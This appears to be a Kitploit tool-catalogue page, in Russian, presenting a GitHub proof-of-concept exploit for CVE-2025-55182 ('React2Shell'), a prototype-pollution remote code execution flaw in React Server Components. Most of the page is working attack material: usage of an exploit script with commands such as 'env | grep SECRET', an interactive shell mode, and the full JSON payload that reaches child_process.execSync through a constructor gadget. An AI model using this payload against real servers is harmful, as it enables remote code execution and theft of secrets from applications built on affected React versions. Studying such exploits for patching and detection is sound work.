Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

Эксплойт для подтверждения концепции для CVE-2025-55182 (React2Shell), критической уязвимости RCE в React Server Components через загрязнение прототипа. Включает интерактивный режим и режим командной строки.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Доказательство концепции для CVE-2025-55182

CVE-2025-55182 React

Обзор

Практическая демонстрация CVE-2025-55182 (React2Shell) — критической уязвимости удаленного выполнения кода в React Server Components.


Детали уязвимости

  • Идентификатор CVE: CVE-2025-55182
  • Тип: Удаленное выполнение кода через загрязнение прототипа
  • CVSS: 9.8 (КРИТИЧЕСКИЙ)
  • Затронутые версии: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

Вектор атаки

React Server Components десериализуют FormData небезопасным образом. Специально сформированные multipart-поля вызывают загрязнение прототипа и выполняют произвольный код через child_process.execSync.


Быстрая настройка

root@kitploit:~
npm install
pip3 install requests
npm run dev

Приложение запускается по адресу: http://localhost:3000


Эксплуатация

Базовое использование

root@kitploit:~
python3 exploit.py -c "whoami"

Примеры команд

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

Интерактивный режим

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
РЕЗУЛЬТАТ КОМАНДЫ:
your-username
============================================================

> pwd
РЕЗУЛЬТАТ КОМАНДЫ:
/path/to/project
============================================================

> exit

Как это работает

Структура полезной нагрузки

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

Тестирование

Терминал 1: Запуск сервера

root@kitploit:~
npm run dev

Терминал 2: Запуск эксплойта

root@kitploit:~
python3 exploit.py -c "whoami"

Подробный режим

root@kitploit:~
python3 exploit.py -c "whoami" -v

Показывает полную структуру полезной нагрузки и ответ сервера


Ссылки

  • CVE-2025-55182 — NVD
  • Безопасность React
  • Десериализация OWASP

Автор: Guaxinim | Исследования кибербезопасности

Скачать инструмент